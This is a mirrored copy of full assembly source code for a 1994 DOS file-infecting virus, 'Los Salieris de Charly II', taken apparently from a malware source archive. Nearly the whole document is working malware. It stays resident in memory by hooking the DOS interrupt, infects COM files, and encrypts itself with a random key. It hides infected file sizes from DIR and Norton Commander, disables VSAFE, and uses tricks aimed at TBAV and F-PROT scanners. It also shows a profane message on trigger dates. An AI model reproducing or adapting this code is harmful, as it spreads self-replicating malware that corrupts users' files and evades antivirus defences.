mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
637 lines
9.1 KiB
NASM
637 lines
9.1 KiB
NASM
;
|
|
; Virus Los Salieris de Charly II (para compilar normal).
|
|
; (Stealth with TBAV, VSAFE, DIR, NC and MEM)
|
|
;
|
|
; Created by: Ramthes Jones'94 (For Those About to Rock!!
|
|
; (AHORA SI QUE EL TBAV ME LA CHUPA BIEN!!!)
|
|
;
|
|
; Fuente de mierda! hasta donde pensas llegar? porque estos gatos
|
|
; solo hablan en ingles... grrr! desencriptan pero no traducen.
|
|
;
|
|
; DANGER!!: What you're gonna read could be bad for your health!
|
|
; Please! try to understand... my prgs don't run...
|
|
; they creep >:-D he he he!
|
|
;
|
|
CODE SEGMENT
|
|
|
|
.286c
|
|
ASSUME CS:CODE, DS:CODE, ES:CODE
|
|
ORG 100h
|
|
|
|
START:
|
|
JMP COMIENZO
|
|
NOP
|
|
NOP
|
|
NOP
|
|
INT 20h
|
|
|
|
COMIENZO:
|
|
ONE LABEL BYTE
|
|
INT 03h ; This piece o'shit's for TBAV :( :::
|
|
MOV BX,0107h
|
|
PUSH BX
|
|
MOV AH,0Dh ; ??? What?????????!
|
|
MOV CX,(OFFSET INCRIPT - OFFSET ONE) - (OFFSET DESDE_ACA - OFFSET ONE)
|
|
MOV SI,(OFFSET DESDE_ACA - OFFSET ONE)
|
|
ADD SI,BX
|
|
DESENCRIPTO:
|
|
MOV DL,CS:[((NUMERO - OFFSET ONE) + BX)]
|
|
XOR [SI],DL
|
|
INC SI
|
|
XOR AH,AH ; This shit's for F-PROT
|
|
INT 02h ; This shit's for TBAV
|
|
LOOP DESENCRIPTO
|
|
|
|
JMP DESDE_ACA
|
|
INT 21h
|
|
|
|
MOV AX,4C00h
|
|
INT 21h
|
|
|
|
DESDE_ACA:
|
|
MOV AX,0CACAh
|
|
INT 21h
|
|
CMP AX,0FEDEh
|
|
JE CORRE_PROG_1
|
|
JMP CHUPAMELA
|
|
CORRE_PROG_1:
|
|
JMP CORRE_PROG
|
|
|
|
CHUPAMELA:
|
|
PUSH AX
|
|
PUSH DX
|
|
MOV AX,0FA01h
|
|
MOV DX,5945h
|
|
INT 21h
|
|
POP DX
|
|
POP AX
|
|
|
|
MOV AH,4Ah
|
|
XOR BX,BX
|
|
INT 21h
|
|
|
|
MOV AH,4Ah
|
|
MOV BX,0FFFFh
|
|
INT 21h
|
|
|
|
SUB BX,101h
|
|
MOV AH,4Ah
|
|
INT 21h
|
|
|
|
MOV AH,48h
|
|
MOV BX,100h
|
|
INT 21h
|
|
|
|
MOV ES,AX
|
|
PUSH ES
|
|
DEC AX
|
|
MOV ES,AX
|
|
MOV ES:WORD PTR [0001h], 0008h
|
|
POP ES
|
|
|
|
PUSH CS
|
|
POP DS
|
|
|
|
POP SI
|
|
PUSH SI
|
|
XOR DI,DI
|
|
MOV CX,OFFSET TWO - OFFSET ONE
|
|
CLD
|
|
REP MOVSB
|
|
|
|
PUSH ES
|
|
POP DS
|
|
|
|
MOV AX,3521h
|
|
INT 21h
|
|
POP SI
|
|
PUSH SI
|
|
MOV DS:[INT21IP - OFFSET ONE],BX
|
|
MOV DS:[INT21CS - OFFSET ONE],ES
|
|
|
|
MOV AX,2521h
|
|
MOV DX,(OFFSET HOOK_21 - OFFSET ONE)
|
|
INT 21h
|
|
|
|
MOV AH,04h
|
|
INT 1Ah
|
|
CMP DX,0526h
|
|
JE JODE_2
|
|
CMP DX,1126h
|
|
JE JODE_2
|
|
CMP DX,1021h
|
|
JE JODE_2
|
|
JMP NO_JODE
|
|
JODE_2:
|
|
MOV AX,3513h
|
|
INT 21h
|
|
MOV DS:[INT17IP - OFFSET ONE],BX
|
|
MOV DS:[INT17CS - OFFSET ONE],ES
|
|
|
|
MOV AX,2513h
|
|
MOV DX,(OFFSET HOOK_13 - OFFSET ONE)
|
|
INT 21h
|
|
NO_JODE:
|
|
PUSH CS
|
|
PUSH CS
|
|
POP DS
|
|
POP ES
|
|
|
|
CORRE_PROG:
|
|
POP BX
|
|
|
|
MOV DI,100h
|
|
LEA SI,[(NORMAL - OFFSET ONE) + BX]
|
|
MOVSW
|
|
MOVSB
|
|
|
|
PUSH CS
|
|
PUSH 0100h
|
|
RETF
|
|
|
|
HOOK_21 PROC FAR
|
|
PUSH DS
|
|
PUSHF
|
|
PUSH AX
|
|
PUSH BX
|
|
PUSH CX
|
|
PUSH DX
|
|
PUSH SI
|
|
PUSH DI
|
|
PUSH DS
|
|
PUSH ES
|
|
|
|
CMP AX,0CACAh
|
|
JE RESIDE
|
|
CMP AH,4Bh
|
|
JE INFECTA1
|
|
CMP AH,3Dh
|
|
JE INFECT_FAST1
|
|
CMP AH,4Eh
|
|
JE NO_NC
|
|
CMP AH,4Fh
|
|
JE NO_NC
|
|
CMP AH, 11h
|
|
JE NO_DIR
|
|
CMP AH, 12h
|
|
JE NO_DIR
|
|
JMP FIN
|
|
|
|
INFECTA1: JMP INFECTA
|
|
INFECT_FAST1: JMP INFECT_FAST
|
|
RESIDE:
|
|
POP ES
|
|
POP DS
|
|
POP DI
|
|
POP SI
|
|
POP DX
|
|
POP CX
|
|
POP BX
|
|
POP AX
|
|
|
|
POPF
|
|
POP DS
|
|
MOV AX,0FEDEh
|
|
IRET
|
|
|
|
NO_DIR PROC
|
|
POP ES
|
|
POP DS
|
|
POP DI
|
|
POP SI
|
|
POP DX
|
|
POP CX
|
|
POP BX
|
|
POP AX
|
|
POPF
|
|
POP DS
|
|
|
|
PUSH CX
|
|
PUSH BX
|
|
PUSH ES
|
|
|
|
PUSH AX
|
|
MOV AH,2Fh
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
POP AX
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
PUSH AX
|
|
PUSHF
|
|
OR AL,AL
|
|
JNE FINHANDLER2
|
|
CMP BYTE PTR ES:[BX],0FFh
|
|
JNE NOEXTENDED
|
|
ADD BX,07h
|
|
|
|
NOEXTENDED:
|
|
MOV CX,ES:[BX+17h]
|
|
AND CL,00011111b
|
|
CMP CL,00001101b
|
|
JNE FINHANDLER2
|
|
SUB WORD PTR ES:[BX+1Dh],OFFSET TWO - OFFSET ONE ;LE RESTO EL VALOR DEL PRG
|
|
SBB WORD PTR ES:[BX+1Fh],0
|
|
FINHANDLER2:
|
|
POPF
|
|
POP AX
|
|
POP ES
|
|
POP BX
|
|
POP CX
|
|
RETF 0002h
|
|
NO_DIR ENDP
|
|
|
|
NO_NC PROC
|
|
POP ES
|
|
POP DS
|
|
POP DI
|
|
POP SI
|
|
POP DX
|
|
POP CX
|
|
POP BX
|
|
POP AX
|
|
POPF
|
|
POP DS
|
|
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
PUSHF
|
|
PUSH AX
|
|
PUSH BX
|
|
PUSH CX
|
|
PUSH ES
|
|
|
|
MOV AH,2Fh
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
|
|
MOV CX,ES:[BX+16h]
|
|
AND CL,00011111b
|
|
CMP CL,00001101b
|
|
JE SI_RECUBRO
|
|
JMP NO_RECUBRO
|
|
|
|
SI_RECUBRO:
|
|
SUB WORD PTR ES:[BX+1Ah],OFFSET TWO - OFFSET ONE ;LE RESTO EL VALOR DEL PRG
|
|
|
|
NO_RECUBRO:
|
|
POP ES
|
|
POP CX
|
|
POP BX
|
|
POP AX
|
|
POPF
|
|
RETF 2
|
|
NO_NC ENDP
|
|
|
|
FIN_1: JMP FIN
|
|
|
|
INFECT_FAST:
|
|
MOV SI,DX
|
|
BUCLE:
|
|
CMP BYTE PTR [SI],"."
|
|
JE YASTA
|
|
CMP BYTE PTR [SI],00h
|
|
JE FIN_1
|
|
INC SI
|
|
JMP BUCLE
|
|
YASTA:
|
|
PUSH SI
|
|
BUCLE2:
|
|
CMP BYTE PTR [SI],"\"
|
|
JE YASTA2
|
|
CMP SI,DX
|
|
JNE NOSTA2
|
|
DEC SI
|
|
JMP YASTA2
|
|
NOSTA2:
|
|
DEC SI
|
|
JMP BUCLE2
|
|
YASTA2:
|
|
INC SI
|
|
MOV AX,[SI]
|
|
OR AX,2020h
|
|
CMP AX,"oc"
|
|
JNE DALEPUES
|
|
INC SI
|
|
INC SI
|
|
MOV AX,[SI]
|
|
OR AX,2020h
|
|
CMP AX,"mm"
|
|
JNE DALEPUES
|
|
POP SI
|
|
JMP FIN_1
|
|
|
|
DALEPUES:
|
|
POP SI
|
|
INC SI
|
|
MOV AX,[SI]
|
|
OR AX,2020h
|
|
CMP AX,"oc"
|
|
JNE FIN_1
|
|
|
|
INFECTA:
|
|
PUSH AX
|
|
PUSH BX
|
|
PUSH DX
|
|
PUSH DS
|
|
PUSH ES
|
|
|
|
MOV AX, CS
|
|
MOV DS, AX
|
|
MOV AX,3524h
|
|
PUSHF
|
|
CALL DWORD PTR DS:[INT21IP - OFFSET ONE]
|
|
MOV DS:[INT24IP - OFFSET ONE],BX
|
|
MOV DS:[INT24CS - OFFSET ONE],ES
|
|
|
|
MOV AX,2524h
|
|
MOV DX,(OFFSET HOOK_24 - OFFSET ONE)
|
|
PUSHF
|
|
CALL DWORD PTR DS:[INT21IP - OFFSET ONE]
|
|
POP ES
|
|
POP DS
|
|
POP DX
|
|
POP BX
|
|
POP AX
|
|
|
|
PUSH DX
|
|
PUSH DX
|
|
|
|
CALL REMUEVE_BITS
|
|
|
|
POP DX
|
|
MOV AX,4300h
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
MOV CS:[(ATRIBUTOS - OFFSET ONE)],CX
|
|
|
|
MOV AX,4301h
|
|
MOV CX,20h
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
JC FINAL_1
|
|
|
|
MOV AX,3D02h
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
PUSH AX
|
|
POP BX
|
|
|
|
MOV AH,3Fh
|
|
MOV CX,2
|
|
PUSH CS
|
|
POP DS
|
|
MOV DX,(OFFSET NORMAL - OFFSET ONE)
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
|
|
XOR SI,SI
|
|
MOV AL,CS:(NORMAL - OFFSET ONE)[SI]
|
|
CMP AL,'M'
|
|
JE FINAL_1
|
|
INC SI
|
|
MOV AL,CS:(NORMAL - OFFSET ONE)[SI]
|
|
CMP AL,'Z'
|
|
JE FINAL_1
|
|
JMP CONTI
|
|
FINAL_1:
|
|
JMP FINAL
|
|
|
|
CONTI:
|
|
MOV AX,5700h
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
MOV CS:[(HORA - OFFSET ONE)],CX
|
|
MOV CS:[(FECHA - OFFSET ONE)],DX
|
|
|
|
AND CL,00011111b ; Esto es lo correcto para comprobar
|
|
CMP CL,00001101b ; si los segundos son 26
|
|
JE FINAL_1
|
|
|
|
MOV AX,4200h
|
|
CWD
|
|
MOV CX,DX
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
|
|
MOV AH,3Fh
|
|
MOV CX,3
|
|
PUSH CS
|
|
POP DS
|
|
MOV DX,(OFFSET NORMAL - OFFSET ONE)
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
|
|
MOV AX,4202h
|
|
CWD
|
|
MOV CX,DX
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
PUSH AX
|
|
|
|
SUB AX,3
|
|
|
|
MOV SI,1
|
|
MOV CS:(BUFFER - OFFSET ONE)[SI],AL
|
|
INC SI
|
|
MOV CS:(BUFFER - OFFSET ONE)[SI],AH
|
|
|
|
; PUSH AX ;MIERDA1
|
|
|
|
MOV AH,2Ch
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
MOV CS:[NUMERO - OFFSET ONE],DL
|
|
|
|
PUSH BX
|
|
MOV AH,48h
|
|
MOV BX,150h
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
MOV ES,AX
|
|
POP BX
|
|
|
|
PUSH CS
|
|
POP DS
|
|
|
|
XOR SI,SI
|
|
MOV DI,SI
|
|
MOV CX,OFFSET TWO - OFFSET ONE
|
|
CLD
|
|
REP MOVSB
|
|
|
|
PUSH ES
|
|
POP DS
|
|
|
|
POP AX ;LL
|
|
INC AH
|
|
XOR SI,SI ;LL
|
|
MOV ES:[SI + 2],AL ;OPA
|
|
MOV ES:[SI + 3],AH
|
|
|
|
MOV CX,(OFFSET INCRIPT - OFFSET ONE) - (OFFSET DESDE_ACA - OFFSET ONE)
|
|
MOV SI,(OFFSET DESDE_ACA - OFFSET ONE)
|
|
ENCRIPTO:
|
|
XOR [SI],DL
|
|
INC SI
|
|
LOOP ENCRIPTO
|
|
|
|
MOV AH,40h
|
|
MOV CX,OFFSET TWO - OFFSET ONE
|
|
XOR DX,DX
|
|
PUSH ES
|
|
POP DS
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
JC FINAL
|
|
|
|
MOV AH,49h
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
|
|
MOV AX,4200h
|
|
CWD
|
|
MOV CX,DX
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
|
|
MOV AH,40h
|
|
MOV CX,3
|
|
MOV DX,(OFFSET BUFFER - OFFSET ONE)
|
|
PUSH CS
|
|
POP DS
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
|
|
MOV AX,5701h
|
|
MOV CX,CS:[(HORA - OFFSET ONE)]
|
|
AND CL,11100000b
|
|
OR CL,00001101b
|
|
MOV DX,CS:[(FECHA - OFFSET ONE)]
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
FINAL:
|
|
MOV AH,3Eh
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
|
|
MOV AX,4301h
|
|
MOV CX,CS:[(ATRIBUTOS - OFFSET ONE)]
|
|
POP DX
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
|
|
CALL RESTAURA_BITS
|
|
|
|
MOV AX,2524h
|
|
MOV DX,CS:[INT24IP - OFFSET ONE]
|
|
MOV DS,CS:[INT24CS - OFFSET ONE]
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP-OFFSET ONE]
|
|
|
|
FIN:
|
|
POP ES
|
|
POP DS
|
|
POP DI
|
|
POP SI
|
|
POP DX
|
|
POP CX
|
|
POP BX
|
|
POP AX
|
|
|
|
POPF
|
|
POP DS
|
|
JMP DWORD PTR CS:[(INT21IP - OFFSET ONE)]
|
|
HOOK_21 ENDP
|
|
|
|
HOOK_13 PROC
|
|
PUSHF
|
|
PUSH AX
|
|
PUSH BX
|
|
PUSH CX
|
|
PUSH SI
|
|
XOR BX,BX
|
|
MOV SI,31
|
|
MOV CX,75
|
|
ESCRIBE:
|
|
MOV AH,0Eh
|
|
MOV AL,CS:(TEXTO - OFFSET ONE)[SI]
|
|
INT 10h
|
|
INC SI
|
|
LOOP ESCRIBE
|
|
POP SI
|
|
POP CX
|
|
POP BX
|
|
POP AX
|
|
POPF
|
|
JMP DWORD PTR CS:[(INT17IP - OFFSET ONE)]
|
|
HOOK_13 ENDP
|
|
|
|
HOOK_24 PROC
|
|
XOR AL,AL
|
|
IRET
|
|
HOOK_24 ENDP
|
|
|
|
V_SAFE PROC
|
|
MOV AH,0FAh
|
|
MOV DX,5945h
|
|
INT 21h
|
|
RET
|
|
V_SAFE ENDP
|
|
|
|
VERIFICA_RESIDENCIA PROC
|
|
XOR AL,AL
|
|
CALL V_SAFE
|
|
CMP BX,2F00h
|
|
JE FORI
|
|
STC
|
|
FORI: RET
|
|
VERIFICA_RESIDENCIA ENDP
|
|
|
|
REMUEVE_BITS PROC
|
|
CALL VERIFICA_RESIDENCIA
|
|
JC FORI_1
|
|
MOV AL,02h
|
|
MOV BL,00000000b
|
|
CALL V_SAFE
|
|
MOV CS:[SEBA-OFFSET ONE],CL
|
|
FORI_1:
|
|
CLC
|
|
RET
|
|
REMUEVE_BITS ENDP
|
|
|
|
RESTAURA_BITS PROC
|
|
CALL VERIFICA_RESIDENCIA
|
|
JC FORI_2
|
|
MOV AL,02
|
|
MOV BL,CS:[SEBA-OFFSET ONE]
|
|
CALL V_SAFE
|
|
FORI_2:
|
|
CLC
|
|
RET
|
|
RESTAURA_BITS ENDP
|
|
|
|
INT21IP DW 0
|
|
INT21CS DW 0
|
|
INT24IP DW 0
|
|
INT24CS DW 0
|
|
INT17IP DW 0
|
|
INT17CS DW 0
|
|
ATRIBUTOS DW 0
|
|
SEBA DB 1
|
|
HORA DW 0
|
|
FECHA DW 0
|
|
BUFFER DB 3 DUP(0E9h)
|
|
NORMAL DB 3 DUP(90h)
|
|
TEXTO DB "VIRUS LOS SALIERIS DE CHARLY 2."
|
|
DB "AIN'T A HACKER,"
|
|
DB "AIN'T A CRACKER,"
|
|
DB "I AM ONLY A MOTHERFUCKER."
|
|
DB 'DEDICATED TO "MACA"'
|
|
INCRIPT LABEL BYTE
|
|
NUMERO DB 1 DUP(0)
|
|
|
|
TWO LABEL BYTE
|
|
|
|
CODE ENDS
|
|
END START |